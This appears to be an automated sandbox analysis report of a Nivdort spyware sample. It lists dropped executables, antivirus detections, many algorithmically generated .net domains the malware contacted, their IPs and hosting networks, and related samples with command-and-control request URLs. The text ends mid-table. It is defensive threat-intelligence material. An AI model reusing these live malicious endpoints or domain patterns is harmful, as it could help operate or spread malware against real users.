C:\whfkpbh\qbf30bzbv7f7qnhdav.exe, PE32 14->36 dropped 23 qbf30bzbv7f7qnhdav.exe 10 14->23         started        file6 signatures7 process8 file9 26 idtpqzltyfy.exe 8 20->26         started        32 C:\whfkpbh\idtpqzltyfy.exe, PE32 23->32 dropped 58 Antivirus detection for dropped file 23->58 60 Multi AV Scanner detection for dropped file 23->60 62 Machine Learning detection for dropped file 23->62 28 idtpqzltyfy.exe 4 23->28         started        signatures10 process11 process12 30 amdrhfskpcu.exe 4 26->30         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
mtuXDnH1Di.exe92%ReversingLabsWin32.Spyware.Nivdort
mtuXDnH1Di.exe100%AviraTR/Nivdort.Gen2
mtuXDnH1Di.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\whfkpbh\idtpqzltyfy.exe100%AviraTR/Nivdort.Gen2
C:\whfkpbh\amdrhfskpcu.exe100%AviraTR/Nivdort.Gen2
C:\whfkpbh\qbf30bzbv7f7qnhdav.exe100%AviraTR/Nivdort.Gen2
C:\whfkpbh\idtpqzltyfy.exe100%Joe Sandbox ML
C:\whfkpbh\amdrhfskpcu.exe100%Joe Sandbox ML
C:\whfkpbh\qbf30bzbv7f7qnhdav.exe100%Joe Sandbox ML
C:\whfkpbh\amdrhfskpcu.exe92%ReversingLabsWin32.Spyware.Nivdort
C:\whfkpbh\idtpqzltyfy.exe92%ReversingLabsWin32.Spyware.Nivdort
C:\whfkpbh\qbf30bzbv7f7qnhdav.exe92%ReversingLabsWin32.Spyware.Nivdort

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_0%Avira URL Cloudsafe
https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par0%Avira URL Cloudsafe
https://fasthosts.co.uk/0%Avira URL Cloudsafe
https://followfriend.net/index.php0%Avira URL Cloudsafe
https://www.fasthosts.co.uk/domain-names/search/?domain=$0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
crowdtrust.net
170.187.200.48
truefalse
    		unknown
    watersystem.net
    		64.190.63.222
    		truefalse
      		unknown
      thoughtsystem.net
      		213.171.195.105
      		truefalse
        		unknown
        membersystem.net
        		85.13.130.3
        		truefalse
          		unknown
          partygeneral.net
          		3.33.130.190
          		truefalse
            		unknown
            womanbelieve.net
            		15.197.142.173
            		truefalse
              		unknown
              womanhonor.net
              		54.244.188.177
              		truefalse
                		unknown
                membertrust.net
                		3.33.130.190
                		truefalse
                  		unknown
                  memberreceive.net
                  		35.164.78.200
                  		truefalse
                    		unknown
                    followfriend.net
                    		188.225.40.227
                    		truefalse
                      		unknown
                      partybelieve.net
                      		15.197.192.55
                      		truefalse
                        		unknown
                        freshfancy.net
                        		81.169.145.88
                        		truefalse
                          		unknown
                          alreadyfriend.net
                          		15.197.192.55
                          		truefalse
                            		unknown
                            thoughtbranch.net
                            		34.246.200.160
                            		truefalse
                              		unknown
                              beginhonor.net
                              		unknown
                              		unknowntrue
                                		unknown
                                memberlaughter.net
                                		unknown
                                		unknowntrue
                                  		unknown
                                  freshneither.net
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    thoughtneither.net
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      experiencefancy.net
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        followconsider.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          alreadyhonor.net
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            fighttrust.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              knownsystem.net
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                gentlemanhonor.net
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  memberfriend.net
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    freshtrust.net
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      experiencetrust.net
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown
                                                        alreadybelieve.net
                                                        		unknown
                                                        		unknowntrue
                                                          		unknown
                                                          partyclear.net
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            waterquarter.net
                                                            		unknown
                                                            		unknowntrue
                                                              		unknown
                                                              fightbranch.net
                                                              		unknown
                                                              		unknowntrue
                                                                		unknown
                                                                knownlaughter.net
                                                                		unknown
                                                                		unknowntrue
                                                                  		unknown
                                                                  followtrust.net
                                                                  		unknown
                                                                  		unknowntrue
                                                                    		unknown
                                                                    experiencebelieve.net
                                                                    		unknown
                                                                    		unknowntrue
                                                                      		unknown
                                                                      summerhonor.net
                                                                      		unknown
                                                                      		unknowntrue
                                                                        		unknown
                                                                        thoughttrust.net
                                                                        		unknown
                                                                        		unknowntrue
                                                                          		unknown
                                                                          freshhonor.net
                                                                          		unknown
                                                                          		unknowntrue
                                                                            		unknown
                                                                            followfancy.net
                                                                            		unknown
                                                                            		unknowntrue
                                                                              		unknown
                                                                              freshfriend.net
                                                                              		unknown
                                                                              		unknowntrue
                                                                                		unknown
                                                                                freshconsider.net
                                                                                		unknown
                                                                                		unknowntrue
                                                                                  		unknown
                                                                                  summerquarter.net
                                                                                  		unknown
                                                                                  		unknowntrue
                                                                                    		unknown
                                                                                    gentlemantrust.net
                                                                                    		unknown
                                                                                    		unknowntrue
                                                                                      		unknown
                                                                                      fightinclude.net
                                                                                      		unknown
                                                                                      		unknowntrue
                                                                                        		unknown
                                                                                        gentlemanlaughter.net
                                                                                        		unknown
                                                                                        		unknowntrue
                                                                                          		unknown
                                                                                          memberbelieve.net
                                                                                          		unknown
                                                                                          		unknowntrue
                                                                                            		unknown
                                                                                            alreadylaughter.net
                                                                                            		unknown
                                                                                            		unknowntrue
                                                                                              		unknown
                                                                                              summerreceive.net
                                                                                              		unknown
                                                                                              		unknowntrue
                                                                                                		unknown
                                                                                                smokequarter.net
                                                                                                		unknown
                                                                                                		unknowntrue
                                                                                                  		unknown
                                                                                                  experiencesystem.net
                                                                                                  		unknown
                                                                                                  		unknowntrue
                                                                                                    		unknown
                                                                                                    thoughthonor.net
                                                                                                    		unknown
                                                                                                    		unknowntrue
                                                                                                      		unknown
                                                                                                      followbelieve.net
                                                                                                      		unknown
                                                                                                      		unknowntrue
                                                                                                        		unknown
                                                                                                        knowntrust.net
                                                                                                        		unknown
                                                                                                        		unknowntrue
                                                                                                          		unknown
                                                                                                          partybranch.net
                                                                                                          		unknown
                                                                                                          		unknowntrue
                                                                                                            		unknown
                                                                                                            crowdneither.net
                                                                                                            		unknown
                                                                                                            		unknowntrue
                                                                                                              		unknown
                                                                                                              womaninclude.net
                                                                                                              		unknown
                                                                                                              		unknowntrue
                                                                                                                		unknown
                                                                                                                smokebelieve.net
                                                                                                                		unknown
                                                                                                                		unknowntrue
                                                                                                                  		unknown
                                                                                                                  fightnorth.net
                                                                                                                  		unknown
                                                                                                                  		unknowntrue
                                                                                                                    		unknown
                                                                                                                    gentlemanneither.net
                                                                                                                    		unknown
                                                                                                                    		unknowntrue
                                                                                                                      		unknown
                                                                                                                      followquarter.net
                                                                                                                      		unknown
                                                                                                                      		unknowntrue
                                                                                                                        		unknown
                                                                                                                        knownhonor.net
                                                                                                                        		unknown
                                                                                                                        		unknowntrue
                                                                                                                          		unknown
                                                                                                                          womantrust.net
                                                                                                                          		unknown
                                                                                                                          		unknowntrue
                                                                                                                            		unknown
                                                                                                                            memberquarter.net
                                                                                                                            		unknown
                                                                                                                            		unknowntrue
                                                                                                                              		unknown
                                                                                                                              experiencefriend.net
                                                                                                                              		unknown
                                                                                                                              		unknowntrue
                                                                                                                                		unknown
                                                                                                                                waterbranch.net
                                                                                                                                		unknown
                                                                                                                                		unknowntrue
                                                                                                                                  		unknown
                                                                                                                                  smoketrust.net
                                                                                                                                  		unknown
                                                                                                                                  		unknowntrue
                                                                                                                                    		unknown
                                                                                                                                    gentlemanreceive.net
                                                                                                                                    		unknown
                                                                                                                                    		unknowntrue
                                                                                                                                      		unknown
                                                                                                                                      fightsystem.net
                                                                                                                                      		unknown
                                                                                                                                      		unknowntrue
                                                                                                                                        		unknown
                                                                                                                                        memberfancy.net
                                                                                                                                        		unknown
                                                                                                                                        		unknowntrue
                                                                                                                                          		unknown
                                                                                                                                          crowdhonor.net
                                                                                                                                          		unknown
                                                                                                                                          		unknowntrue
                                                                                                                                            		unknown
                                                                                                                                            summerbelieve.net
                                                                                                                                            		unknown
                                                                                                                                            		unknowntrue
                                                                                                                                              		unknown
                                                                                                                                              womanbranch.net
                                                                                                                                              		unknown
                                                                                                                                              		unknowntrue
                                                                                                                                                		unknown
                                                                                                                                                crowdbranch.net
                                                                                                                                                		unknown
                                                                                                                                                		unknowntrue
                                                                                                                                                  		unknown
                                                                                                                                                  beginbranch.net
                                                                                                                                                  		unknown
                                                                                                                                                  		unknowntrue
                                                                                                                                                    		unknown
                                                                                                                                                    experiencehonor.net
                                                                                                                                                    		unknown
                                                                                                                                                    		unknowntrue
                                                                                                                                                      		unknown
                                                                                                                                                      waterreceive.net
                                                                                                                                                      		unknown
                                                                                                                                                      		unknowntrue
                                                                                                                                                        		unknown
                                                                                                                                                        gentlemansystem.net
                                                                                                                                                        		unknown
                                                                                                                                                        		unknowntrue
                                                                                                                                                          		unknown
                                                                                                                                                          crowdsystem.net
                                                                                                                                                          		unknown
                                                                                                                                                          		unknowntrue
                                                                                                                                                            		unknown
                                                                                                                                                            knownbelieve.net
                                                                                                                                                            		unknown
                                                                                                                                                            		unknowntrue
                                                                                                                                                              		unknown
                                                                                                                                                              knownquarter.net
                                                                                                                                                              		unknown
                                                                                                                                                              		unknowntrue
                                                                                                                                                                		unknown
                                                                                                                                                                beginsystem.net
                                                                                                                                                                		unknown
                                                                                                                                                                		unknowntrue
                                                                                                                                                                  		unknown
                                                                                                                                                                  followsystem.net
                                                                                                                                                                  		unknown
                                                                                                                                                                  		unknowntrue
                                                                                                                                                                    		unknown
                                                                                                                                                                    crowdreceive.net
                                                                                                                                                                    		unknown
                                                                                                                                                                    		unknowntrue
                                                                                                                                                                      		unknown
                                                                                                                                                                      alreadyquarter.net
                                                                                                                                                                      		unknown
                                                                                                                                                                      		unknowntrue
                                                                                                                                                                        		unknown
                                                                                                                                                                        beginquarter.net
                                                                                                                                                                        		unknown
                                                                                                                                                                        		unknowntrue
                                                                                                                                                                          		unknown
                                                                                                                                                                          freshbelieve.net
                                                                                                                                                                          		unknown
                                                                                                                                                                          		unknowntrue
                                                                                                                                                                            		unknown
                                                                                                                                                                            alreadyconsider.net
                                                                                                                                                                            		unknown
                                                                                                                                                                            		unknowntrue
                                                                                                                                                                              		unknown
                                                                                                                                                                              alreadytrust.net
                                                                                                                                                                              		unknown
                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                		unknown
                                                                                                                                                                                freshquarter.net
                                                                                                                                                                                		unknown
                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  gentlemanfriend.net
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    beginbelieve.net
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      memberhonor.net
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        summersystem.net
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          partyquarter.net
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          		unknowntrue
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            alreadyfancy.net
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            		unknowntrue
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              fightneither.net
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              		unknowntrue
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                alreadybranch.net
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                		unknowntrue
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  partynorth.net
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  		unknowntrue
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    womangeneral.net
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    		unknowntrue
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      thoughtreceive.net
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      		unknowntrue
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        smokegeneral.net
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        		unknowntrue
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          URLs from Memory and Binaries

                                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          https://fasthosts.co.uk/idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://www.fasthosts.co.uk/domain-names/search/?domain=$idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://followfriend.net/index.phpidtpqzltyfy.exe, 00000003.00000002.2069906189.0000000001F6D000.00000004.00000010.00020000.00000000.sdmp, idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_paridtpqzltyfy.exe, 00000003.00000002.2069906189.0000000001F6D000.00000004.00000010.00020000.00000000.sdmp, idtpqzltyfy.exe, 00000003.00000002.2069414973.000000000113A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          188.225.40.227
                                                                                                                                                                                                          		followfriend.netRussian Federation
                                                                                                                                                                                                          		9123TIMEWEB-ASRUfalse
                                                                                                                                                                                                          34.246.200.160
                                                                                                                                                                                                          		thoughtbranch.netUnited States
                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                          35.164.78.200
                                                                                                                                                                                                          		memberreceive.netUnited States
                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                          15.197.142.173
                                                                                                                                                                                                          		womanbelieve.netUnited States
                                                                                                                                                                                                          		7430TANDEMUSfalse
                                                                                                                                                                                                          64.190.63.222
                                                                                                                                                                                                          		watersystem.netUnited States
                                                                                                                                                                                                          		11696NBS11696USfalse
                                                                                                                                                                                                          85.13.130.3
                                                                                                                                                                                                          		membersystem.netGermany
                                                                                                                                                                                                          		34788NMM-ASD-02742FriedersdorfHauptstrasse68DEfalse
                                                                                                                                                                                                          170.187.200.48
                                                                                                                                                                                                          		crowdtrust.netUnited States
                                                                                                                                                                                                          		7018ATT-INTERNET4USfalse
                                                                                                                                                                                                          54.244.188.177
                                                                                                                                                                                                          		womanhonor.netUnited States
                                                                                                                                                                                                          		16509AMAZON-02USfalse
                                                                                                                                                                                                          15.197.192.55
                                                                                                                                                                                                          		partybelieve.netUnited States
                                                                                                                                                                                                          		7430TANDEMUSfalse
                                                                                                                                                                                                          3.33.130.190
                                                                                                                                                                                                          		partygeneral.netUnited States
                                                                                                                                                                                                          		8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                                                          213.171.195.105
                                                                                                                                                                                                          		thoughtsystem.netUnited Kingdom
                                                                                                                                                                                                          		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                                                                                                                                                          81.169.145.88
                                                                                                                                                                                                          		freshfancy.netGermany
                                                                                                                                                                                                          		6724STRATOSTRATOAGDEfalse

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                          Analysis ID:1488113
                                                                                                                                                                                                          Start date and time:2024-08-05 16:21:56 +02:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 7m 0s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:14
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:mtuXDnH1Di.exe
                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                          Original Sample Name:475c13ae1d446c61824315961e5838916ac4a3f28bc441aa8a2b39b81383ea4a.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal88.troj.winEXE@14/5@215/12
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 91%
                                                                                                                                                                                                          • Number of executed functions: 82
                                                                                                                                                                                                          • Number of non-executed functions: 88
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 40.119.148.38
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, twc.trafficmanager.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                          • VT rate limit hit for: mtuXDnH1Di.exe

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          11:45:33API Interceptor1858x Sleep call for process: amdrhfskpcu.exe modified
                                                                                                                                                                                                          11:46:18API Interceptor428x Sleep call for process: idtpqzltyfy.exe modified

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          188.225.40.227BeR96suzTx.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.skazhiraku.net/itq4/?ATvHA=k2MpXHpX2FlDSbL&m8=xx/ELnNnKvtlLUNVhX4h3nTX7+vGZrU3iKsqjiSQXnXFY1tr2Fuuzh2bLYvRiJP5MpAf
                                                                                                                                                                                                          Rh3zHXGC0W.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.ikra-prem.space/g8kn/?3f=SObGRIQc2SXqBOlWxSNvpO1BE/+cxQu6skH9Iz/5ZN4shibJkSmH+F/+6dh/KvA+GdhZXNtYOg==&s2J=v6Ah24bh4tF
                                                                                                                                                                                                          doc88.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • www.skazhiraku.net/itq4/?BJ=xx/ELnNnKvtlLUNVhX4h3nTX7+vGZrU3iKsqjiSQXnXFY1tr2Fuuzh2bLbPBtofBSMpY&k6Apv=4hB0VF
                                                                                                                                                                                                          p6le0wM39E.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • cq80904.tmweb.ru/vmHttpdefaultDb.php?K5Glm1IjUwWQCq0Uioy42v=MLZsFTiDn8Em9rir7K7wImpq3&EXQnpxYJ4aMICQvs=R7D0m961u58njgszmOLxASR&0xIfyHrB=3XszmcYUw52afU&3fe0eef725958b7929a02603a5aa73a2=f84fad6cd29a3006db8b86eab6e3e434&36f380f5a045f0456c7866159c7edf74=AZ4YzM3YjZzgDNxkzM5UzMhNTNmVTNhNjN0MmZ4EmN4gzYmVjN4kTZ&K5Glm1IjUwWQCq0Uioy42v=MLZsFTiDn8Em9rir7K7wImpq3&EXQnpxYJ4aMICQvs=R7D0m961u58njgszmOLxASR&0xIfyHrB=3XszmcYUw52afU
                                                                                                                                                                                                          UYAfvxRha7.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • cq80904.tmweb.ru/vmHttpdefaultDb.php?wNx8559dK63E8kRo7N3gYQ=50VYeNDsGBfOUR3suNfn4yWU&3fe0eef725958b7929a02603a5aa73a2=f84fad6cd29a3006db8b86eab6e3e434&36f380f5a045f0456c7866159c7edf74=AZ1MGNjVWZkZTMmRGOmRjNiZWMlNzYiNGZwEmY2UjNlRGZyMmZyQWM&wNx8559dK63E8kRo7N3gYQ=50VYeNDsGBfOUR3suNfn4yWU
                                                                                                                                                                                                          34.246.200.160vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • thoughtbranch.net/index.php
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • thoughtbranch.net/index.php
                                                                                                                                                                                                          7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • figurewithout.net/index.php
                                                                                                                                                                                                          7sAylAXBOb.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • figurewithout.net/index.php
                                                                                                                                                                                                          5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • figurewithout.net/index.php
                                                                                                                                                                                                          5a5O0c0oJP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • figurewithout.net/index.php
                                                                                                                                                                                                          Jla3M8Fe16.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • figurewithout.net/index.php
                                                                                                                                                                                                          35.164.78.200vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • memberreceive.net/index.php
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • memberreceive.net/index.php

                                                                                                                                                                                                          Domains

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          membertrust.netvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 3.33.130.190
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 3.33.130.190
                                                                                                                                                                                                          watersystem.netvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.63.222
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.63.222
                                                                                                                                                                                                          memberreceive.netvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 35.164.78.200
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 35.164.78.200
                                                                                                                                                                                                          partybelieve.netvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.192.55
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.192.55
                                                                                                                                                                                                          crowdtrust.netvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 170.187.200.48
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 170.187.200.48
                                                                                                                                                                                                          thoughtsystem.netvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 213.171.195.105
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 213.171.195.105
                                                                                                                                                                                                          womanbelieve.netvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.142.173
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 15.197.142.173
                                                                                                                                                                                                          womanhonor.netvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 54.244.188.177
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 54.244.188.177
                                                                                                                                                                                                          partygeneral.netvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 3.33.130.190
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 3.33.130.190
                                                                                                                                                                                                          membersystem.netvzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 85.13.130.3
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 85.13.130.3

                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          AMAZON-02USExv453QQIX.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 76.223.105.230
                                                                                                                                                                                                          OneDriveSetup.exeGet hashmaliciousZTratBrowse
                                                                                                                                                                                                          • 3.126.224.214
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 54.244.188.177
                                                                                                                                                                                                          Scanned Docs from Emnes Metal Sdn Bhd_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 76.223.67.189
                                                                                                                                                                                                          http://verizonwireless-employmentvalidation.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 3.124.93.206
                                                                                                                                                                                                          UjCrfOAkJJiZyZh.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                          • 75.2.115.196
                                                                                                                                                                                                          vzPAucRnt7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 54.244.188.177
                                                                                                                                                                                                          .exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 52.42.85.34
                                                                                                                                                                                                          http://beonlineboo.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 35.165.37.251
                                                                                                                                                                                                          https://logicalisuk.my.salesforce.com/setup/emailverif?oid=00D3z000001dzz1&k=Cj4KNQoPMDBEM3owMDAwMDFkenoxEg8wMkczejAwMDAwMFdWOE4aDzAwNTN6MDAwMDBCdWh6dSAFGN_3tJGSMhIQI3v2gs0Smh5HbrrPi2pb3BoMcA-pPOdt_d3-rPC6InFa7HDV_iW9LDPj8xH7hSk3un-1pgfjZvlK5Tv9PNw3ZrbyGYfST1J6GqYfWaKhB7o4-QA7gl67FLrZibn5D9yjxqT_I5lQp1_GTYo4JMlLKQM4byvWuZajquUzFQE2W0EVG_exs3QFRWcL3FGdq-ebSw%3D%3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 99.81.213.111
                                                                                                                                                                                                          TIMEWEB-ASRURuntime Broker.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • 185.114.247.170
                                                                                                                                                                                                          r6KYedz4VQ.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • 185.114.247.170
                                                                                                                                                                                                          Gz3zPqMdtn.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • 185.114.247.170
                                                                                                                                                                                                          cnGgzU2rkd.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                          • 185.114.247.170
                                                                                                                                                                                                          https://diigo.com/0wzrly?ID=QtERFQmXrhNlWxfeW9PbYZfS3+Email=ambre.boyon@gerflor.comGet hashmaliciousUnknownBrowse
